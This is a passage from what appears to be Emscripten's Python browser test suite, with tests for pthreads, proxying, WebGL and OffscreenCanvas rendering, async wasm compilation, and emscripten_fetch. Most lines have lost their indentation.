    self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
    # Delete the freshly-built local worker so the run must load the cdn copy.
    try_delete('test.worker.js')
    self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(path_from_root('tests', 'pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(path_from_root('tests', 'core', 'test_main_thread_async_em_asm.cpp'), expected=0, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([path_from_root('tests', 'in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
  @requires_sync_compilation
  def test_binaryen_async(self):
    # notice when we use async compilation
    # The injected shell script wraps WebAssembly.instantiate /
    # instantiateStreaming so the page records whether async compilation
    # actually happened (Module.sawAsyncCompilation).
    script = '''
    <script>
    // note if we do async compilation
    var real_wasm_instantiate = WebAssembly.instantiate;
    var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
    if (typeof real_wasm_instantiateStreaming === 'function') {
      WebAssembly.instantiateStreaming = function(a, b) {
        Module.sawAsyncCompilation = true;
        return real_wasm_instantiateStreaming(a, b);
      };
    } else {
      WebAssembly.instantiate = function(a, b) {
        Module.sawAsyncCompilation = true;
        return real_wasm_instantiate(a, b);
      };
    }
    // show stderr for the viewer's fun
    err = function(x) {
      out('<<< ' + x + ' >>>');
      console.log(x);
    };
    </script>
    {{{ SCRIPT }}}
'''
    shell_with_script('shell.html', 'shell.html', script)
    common_args = ['--shell-file', 'shell.html']
    # Each (opts, expect) pair: expect is 1 when async compilation should be
    # observed, 0 when it is explicitly disabled.
    for opts, expect in [
      ([], 1),
      (['-O1'], 1),
      (['-O2'], 1),
      (['-O3'], 1),
      (['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
      (['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
    ]:
      print(opts, expect)
      self.btest_exit('binaryen_async.c', expected=expect, args=common_args + opts)
    # Ensure that compilation still works and is async without instantiateStreaming available
    no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
    shell_with_script('shell.html', 'shell.html', no_streaming + script)
    self.btest_exit('binaryen_async.c', expected=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([path_from_root('tests/manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5368), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', expected='0', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
